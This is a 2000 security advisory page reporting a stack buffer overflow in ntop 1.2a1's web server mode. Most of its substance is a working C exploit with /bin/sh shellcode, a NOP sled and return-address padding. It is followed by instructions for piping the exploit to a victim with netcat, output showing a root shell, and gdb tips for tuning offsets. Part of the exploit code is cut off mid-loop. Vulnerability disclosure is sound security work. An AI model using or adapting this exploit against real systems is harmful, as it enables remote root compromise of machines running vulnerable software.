[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : ntop has a stack-based BOF when it's requested too long

Title: ntop has a stack-based BOF when it's requested too long
Released by:
Date: 25th October 2000
Printable version: Click here 
1. Problem:

 ntop has a stack-based BOF when it's requested too long filename.

2. Tested Version

 ntop-1.2a1

 I only tested this version.

3. Example



 1. first run ntop -w 8080



 2. run this script

 $ printf "GET /`perl -e 'print "A"x240'`\r\n\r\n" |nc localhost 8080



 3. the ntop goes seg. fault.

 $ ntop -w 8080

  ntop v.1.2a1 MT [i686-pc-linux-gnu] listening on eth0.

  Copyright 1998-99 by Luca Deri 

  Warning: unable to read file '.ntop'. No security will be used!

  Waiting for HTTP connections on port 8080...

  Segmentation fault

4. Exploit



----------------------ntop-w-exp.c-----start-----------------------

#include 

#include 





char shellcode[] =

  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

  "\x80\xe8\xdc\xff\xff\xff/bin/sh";



void usage()

{

 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");

 printf("                                 mat@hacksware.com\n");

 printf("Usage : ./ntop-w-exp | nc victim port\n");

 exit(0);

}



void main( int argc, char *argv[] )

{

  int i,offset=-24;

#define CODE_LEN 240

#define NOP_LEN 50

  char code_buf[CODE_LEN];

  unsigned long esp=0xbedffb00;



  if(argc >= 2) offset = atoi(argv[1]);



  memset(code_buf,0x90,NOP_LEN); //insert NOP CODES

  memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));

  for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)

     *(long *)&code_buf[i]=(unsigned long)esp-offset;



  printf("GET /");

  for(i=0;i

  Warning: unable to read file '.ntop'. No security will be used!

  Waiting for HTTP connections on port 8080...





 2. compile exploit

  $ gcc -o ntop-w-exp ntop-w-exp.c

 3. send shell code to overheaven

  $ ./ntop-w-exp |nc overheaven 8080

 4. Now you get root shell in overheaven terminal

  base# hostname

  overheaven

  bash# id

  uid=0(root) gid=500(mat) groups=500(mat),0(root),200(staff)

 5. You cannot get shell in WWW port, so you can alternatively run programs other than "/bin/sh" by modifying shellcode.

 6. If you cannot get shellcode to work, you must modify esp value in ntop-w-exp.c. Using gdb you can easily guess it.



    1. break returnHTTPPage

    2. break strcpy

    3. x/x $esp





=================================================

|                                               |

|               mat@hacksware.com               |

|                                               |

=================================================






(C) 1999-2000 All rights reserved.